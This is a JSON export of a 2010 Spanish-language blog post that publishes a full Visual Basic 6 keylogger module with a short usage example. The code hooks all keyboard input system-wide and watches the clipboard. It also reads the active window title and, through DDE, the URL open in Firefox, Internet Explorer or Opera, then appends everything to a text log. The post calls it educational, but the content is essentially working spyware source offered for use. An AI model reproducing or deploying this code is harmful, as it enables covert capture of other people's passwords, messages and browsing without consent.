{"id":212,"date":"2010-02-13T21:51:32","date_gmt":"2010-02-14T00:51:32","guid":{"rendered":"http:\/\/leandroascierto.com\/blog\/?p=212"},"modified":"2016-12-17T01:13:00","modified_gmt":"2016-12-17T04:13:00","slug":"keylogger","status":"publish","type":"post","link":"https:\/\/leandroascierto.com\/blog\/keylogger\/","title":{"rendered":"KeyLogger"},"content":{"rendered":"

Este es un m\u00f3dulo .bas de un\u00a0Keylogger<\/a>, sirve para capturar las pulsaciones del teclado y almacenarlas en un fichero de texto plano, trae como adicional poder almacenar el t\u00edtulo de la ventana activa, la URL en caso de que dicha ventana sea un navegador y el texto del portapapeles. Est\u00e1 hecho con fines educativos, los m\u00e9todos empleados son Hook al teclado, Hook de la ventana activa, conversaci\u00f3n DDE para las URL y Hook del portapapeles. Vale destacar que no utiliza ning\u00fan tipo de timer para cualquiera de estas operaciones, lo cual hace que sea m\u00e1s eficiente y consuma menos procesador.<\/p>\n

M\u00f3dulo:<\/em><\/p>\n

\r\nOption Explicit\r\n'------------------------------------\r\n'Autor:   Leandro Ascierto\r\n'Web:     www.leandroascierto.com\r\n'Fecha:   13-02-2010\r\n'save input Keys, Active Widows, Url from Navigators and clipboard\r\n'------------------------------------\r\nPrivate Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long\r\nPrivate Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long\r\nPrivate Declare Function UnhookWindowsHookEx Lib "user32.dll" (ByVal hHook As Long) As Long\r\nPrivate Declare Function CallNextHookEx Lib "user32.dll" (ByVal hHook As Long, ByVal nCode As Long, ByVal wParam As Long, ByRef lParam As Any) As Long\r\nPrivate Declare Function PostMessage Lib "user32.dll" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long\r\nPrivate Declare Function CreateWindowEx Lib "user32.dll" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, ByRef lpParam As Any) As Long\r\nPrivate Declare Function DestroyWindow Lib "user32.dll" (ByVal hwnd As Long) As Long\r\nPrivate Declare Function RegisterWindowMessage Lib "user32" Alias "RegisterWindowMessageA" (ByVal lpString As String) As Long\r\nPrivate Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long\r\nPrivate Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long\r\nPrivate Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Any) As Long\r\nPrivate Declare Function RegisterShellHook Lib "Shell32" Alias "#181" (ByVal hwnd As Long, ByVal nAction As Long) As Long\r\nPrivate Declare Function IsClipboardFormatAvailable Lib "user32.dll" (ByVal wFormat As Long) As Long\r\nPrivate Declare Function SetClipboardViewer Lib "user32" (ByVal hwnd As Long) As Long\r\nPrivate Declare Function DdeInitialize Lib "user32" Alias "DdeInitializeA" (pidInst As Long, ByVal pfnCallback As Long, ByVal afCmd As Long, ByVal ulRes As Long) As Integer\r\nPrivate Declare Function DdeCreateStringHandle Lib "user32" Alias "DdeCreateStringHandleA" (ByVal idInst As Long, ByVal psz As String, ByVal iCodePage As Long) As Long\r\nPrivate Declare Function DdeConnect Lib "user32" (ByVal idInst As Long, ByVal hszService As Long, ByVal hszTopic As Long, pCC As Any) As Long\r\nPrivate Declare Function DdeFreeStringHandle Lib "user32" (ByVal idInst As Long, ByVal hsz As Long) As Long\r\nPrivate Declare Function DdeUninitialize Lib "user32" (ByVal idInst As Long) As Long\r\nPrivate Declare Function DdeClientTransaction Lib "user32.dll" (ByRef pData As Byte, ByVal cbData As Long, ByVal hConv As Long, ByVal hszItem As Long, ByVal wFmt As Long, ByVal wType As Long, ByVal dwTimeout As Long, ByRef pdwResult As Long) As Long\r\nPrivate Declare Function DdeAccessData Lib "user32.dll" (ByVal hData As Long, ByRef pcbDataSize As Long) As Long\r\nPrivate Declare Function DdeUnaccessData Lib "user32.dll" (ByVal hData As Long) As Long\r\nPrivate Declare Function DdeFreeDataHandle Lib "user32.dll" (ByVal hData As Long) As Long\r\nPrivate Declare Function DdeDisconnect Lib "user32.dll" (ByVal hConv As Long) As Long\r\nPrivate Declare Function DdeGetLastError Lib "user32.dll" (ByVal idInst As Long) As Long\r\nPrivate Declare Function lstrlenW Lib "kernel32" (ByVal lpString As Long) As Long\r\nPrivate Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)\r\n\r\nPrivate Const XCLASS_DATA               As Long = &H2000\r\nPrivate Const XTYP_REQUEST              As Long = (&HB0 Or XCLASS_DATA)\r\n\r\nPrivate Const CP_WINANSI                As Long = 1004\r\nPrivate Const CF_TEXT                   As Long = 1\r\n\r\nPrivate Const WM_SETTEXT                As Long = &HC\r\nPrivate Const WM_GETTEXTLENGTH          As Long = &HE\r\nPrivate Const WM_GETTEXT                As Long = &HD\r\n\r\nPrivate Const RSH_REGISTER_TASKMAN      As Long = 3\r\nPrivate Const HSHELL_WINDOWACTIVATED    As Long = 4\r\nPrivate Const WH_KEYBOARD_LL            As Long = 13\r\nPrivate Const SHELLHOOKMESSAGE          As String = "SHELLHOOK"\r\nPrivate Const GWL_WNDPROC               As Long = -4\r\n\r\nPrivate Const ES_MULTILINE              As Long = &H4&\r\nPrivate Const ES_AUTOVSCROLL            As Long = &H40&\r\nPrivate Const ES_AUTOHSCROLL            As Long = &H80&\r\n\r\nPrivate Const WM_IME_KEYDOWN            As Long = &H290\r\nPrivate Const WM_SYSKEYDOWN             As Long = &H104\r\nPrivate Const WM_KEYDOWN                As Long = &H100\r\nPrivate Const WM_KEYUP                  As Long = &H101\r\nPrivate Const WM_DRAWCLIPBOARD          As Long = &H308\r\n\r\nPrivate WM_SHELLHOOK                    As Long\r\nPrivate hEdit                           As Long\r\nPrivate hHook                           As Long\r\nPrivate WinProc                         As Long\r\nPrivate hFile                           As Integer\r\nPrivate LastActiveWindow                As Long\r\n\r\nPublic Function StarKeyLogger(ByVal DestPath As String) As Boolean\r\n\r\n    If hEdit Then Exit Function\r\n\r\n    hEdit = CreateWindowEx(0, "EDIT", "", ES_MULTILINE Or ES_AUTOVSCROLL Or ES_AUTOHSCROLL, 0, 0, 0, 0, 0, 0, App.hInstance, 0)\r\n\r\n    If hEdit <> 0 Then\r\n        hFile = FreeFile\r\n        Open DestPath For Append As #hFile\r\n        hHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance, 0)\r\n        WM_SHELLHOOK = RegisterWindowMessage(SHELLHOOKMESSAGE)\r\n        RegisterShellHook hEdit, RSH_REGISTER_TASKMAN\r\n        SetClipboardViewer hEdit\r\n        WinProc = SetWindowLong(hEdit, GWL_WNDPROC, AddressOf WndProc)\r\n        StarKeyLogger = True\r\n    End If\r\n\r\nEnd Function\r\n\r\nPublic Function EndKeyLogger() As Boolean\r\n    If hEdit <> 0 Then\r\n        Call UnhookWindowsHookEx(hHook)\r\n        Call SetWindowLong(hEdit, GWL_WNDPROC, WinProc)\r\n        If GetWindowTextLength(hEdit) > 0 Then SaveLog GetWindowText(hEdit)\r\n        DestroyWindow hEdit: hEdit = 0\r\n        Close #hFile\r\n        EndKeyLogger = True\r\n    End If\r\nEnd Function\r\n\r\nPrivate Function WndProc(ByVal hwnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long\r\n    On Error Resume Next\r\n\r\n    Dim sRet As String\r\n\r\n    WndProc = CallWindowProc(WinProc, hwnd, uMsg, wParam, lParam)\r\n\r\n    Select Case uMsg\r\n        Case WM_SHELLHOOK\r\n\r\n            If wParam = HSHELL_WINDOWACTIVATED Then\r\n                If lParam <> 0 And LastActiveWindow <> lParam Then\r\n                    LastActiveWindow = lParam\r\n\r\n                    If GetWindowTextLength(hEdit) > 0 Then SaveLog GetWindowText(hwnd)\r\n\r\n                    Select Case ClassNameOf(lParam)\r\n                        Case "MozillaUIWindowClass", "MozillaWindowClass"\r\n                            sRet = GetBrowserInfo("firefox")\r\n                        Case "IEFrame"\r\n                            sRet = GetBrowserInfo("iexplore")\r\n                        Case "OpWindow"\r\n                            sRet = GetBrowserInfo("opera")\r\n                    End Select\r\n\r\n                    If sRet <> "" Then\r\n                        SaveLog "[" & Now & "] Ventana Activa: " & GetWindowText(lParam) & vbCrLf & sRet & vbCrLf & String(100, "-") & vbCrLf\r\n                    Else\r\n                        SaveLog "[" & Now & "] Ventana Activa: " & GetWindowText(lParam) & vbCrLf & String(100, "-") & vbCrLf\r\n                    End If\r\n\r\n                End If\r\n\r\n            End If\r\n\r\n        Case WM_DRAWCLIPBOARD\r\n            If IsClipboardFormatAvailable(vbCFText) <> 0 Then\r\n                If GetWindowTextLength(hEdit) > 0 Then SaveLog GetWindowText(hwnd)\r\n                SaveLog "[" & Now & "] Portapaples: " & vbCrLf & String(100, "-") & vbCrLf _\r\n                    & Clipboard.GetText & vbCrLf & String(100, "-") & vbCrLf\r\n            End If\r\n    End Select\r\n\r\nEnd Function\r\n\r\nPrivate Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long\r\n    On Error Resume Next\r\n\r\n    Select Case wParam\r\n\r\n        Case WM_KEYDOWN\r\n            If lParam <> 222 And lParam <> 186 And lParam <> 162 And lParam <> 20 Then\r\n                Call PostMessage(hEdit, WM_IME_KEYDOWN, lParam, 0&)\r\n            End If\r\n\r\n        Case WM_SYSKEYDOWN\r\n            If lParam = 162 Or lParam = 165 Or lParam = 50 Then\r\n                Call PostMessage(hEdit, WM_IME_KEYDOWN, lParam, 0&)\r\n            End If\r\n\r\n    End Select\r\n\r\nEnd Function\r\n\r\nPrivate Function GetBrowserInfo(ByVal sServer As String) As String\r\n\r\n    Dim lpData  As Long, hData   As Long, sData  As String\r\n    Dim hServer As Long, hTopic  As Long, hItem  As Long\r\n    Dim hConv   As Long, idInst  As Long\r\n\r\n    Const sTopic = "WWW_GetWindowInfo"\r\n    Const sItem = "0xFFFFFFFF"\r\n\r\n    If DdeInitialize(idInst, 0, 0, 0) <> 0 Then Exit Function\r\n\r\n    hServer = DdeCreateStringHandle(idInst, sServer, CP_WINANSI)\r\n    hTopic = DdeCreateStringHandle(idInst, sTopic, CP_WINANSI)\r\n    hItem = DdeCreateStringHandle(idInst, sItem, CP_WINANSI)\r\n\r\n    hConv = DdeConnect(idInst, hServer, hTopic, ByVal 0&)\r\n\r\n    If hConv Then\r\n        hData = DdeClientTransaction(0, 0, hConv, hItem, CF_TEXT, XTYP_REQUEST, 1000, 0)\r\n        lpData = DdeAccessData(hData, 0)\r\n        GetBrowserInfo = PtrToString(lpData)\r\n\r\n        DdeUnaccessData hData\r\n        DdeFreeDataHandle hData\r\n        DdeDisconnect hConv\r\n    End If\r\n\r\n    DdeFreeStringHandle idInst, hServer\r\n    DdeFreeStringHandle idInst, hTopic\r\n    DdeFreeStringHandle idInst, hItem\r\n    DdeUninitialize idInst\r\n\r\nEnd Function\r\n\r\nPrivate Function GetWindowTextLength(ByVal hwnd As Long) As Long\r\n    GetWindowTextLength = SendMessage(hwnd, WM_GETTEXTLENGTH, 0&, 0&)\r\nEnd Function\r\n\r\nPrivate Function GetWindowText(ByVal hwnd As Long) As String\r\n    Dim TextLen As Long\r\n    TextLen = SendMessage(hwnd, WM_GETTEXTLENGTH, 0&, 0&)\r\n    GetWindowText = String(TextLen, Chr$(0))\r\n    SendMessage hwnd, WM_GETTEXT, TextLen + 1, GetWindowText\r\nEnd Function\r\n\r\nPrivate Sub SaveLog(ByVal sText As String)\r\n    Print #hFile, sText\r\n    SendMessage hEdit, WM_SETTEXT, 0&, vbNullString\r\nEnd Sub\r\n\r\n Private Function ClassNameOf(ByVal hwnd As Long) As String\r\n    Dim sClassName As String, Ret As Long\r\n    sClassName = Space(256)\r\n    Ret = GetClassName(hwnd, sClassName, 256)\r\n    If Ret Then ClassNameOf = Left$(sClassName, Ret)\r\n End Function\r\n\r\n Private Function PtrToString(lpwString As Long) As String\r\n   Dim Buffer() As Byte\r\n   Dim nLen As Long\r\n   If lpwString Then\r\n      nLen = lstrlenW(lpwString) * 2\r\n      If nLen Then\r\n         ReDim Buffer(0 To (nLen - 1)) As Byte\r\n         CopyMemory Buffer(0), ByVal lpwString, nLen\r\n         PtrToString = StrConv(Buffer, vbUnicode)\r\n      End If\r\n   End If\r\nEnd Function\r\n\r\n<\/pre>\n
Ejemplo de Uso:<\/em><\/p>\n
\r\nOption Explicit\r\n\r\nPrivate Sub Form_Load()\r\n    'Inicializamos el KeyLogger\r\n    StarKeyLogger (App.Path & "\\Log.txt")\r\nEnd Sub\r\n\r\nPrivate Sub Form_Unload(Cancel As Integer)\r\n    'Detenemos el KeyLogger\r\n    Call EndKeyLogger\r\nEnd Sub\r\n\r\n<\/pre>\n
\"\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Este es un m\u00f3dulo .bas de un\u00a0Keylogger, sirve para capturar las pulsaciones del teclado y almacenarlas en un fichero de texto plano, trae como adicional poder almacenar el t\u00edtulo de la ventana activa, la URL en caso de que dicha ventana sea un navegador y el texto del portapapeles. Est\u00e1 hecho con fines educativos, los […]<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[51],"class_list":["post-212","post","type-post","status-publish","format-standard","hentry","category-modulos","tag-keylogger","category-29-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/posts\/212","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/comments?post=212"}],"version-history":[{"count":35,"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/posts\/212\/revisions"}],"predecessor-version":[{"id":814,"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/posts\/212\/revisions\/814"}],"wp:attachment":[{"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/media?parent=212"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/categories?post=212"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/leandroascierto.com\/blog\/wp-json\/wp\/v2\/tags?post=212"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}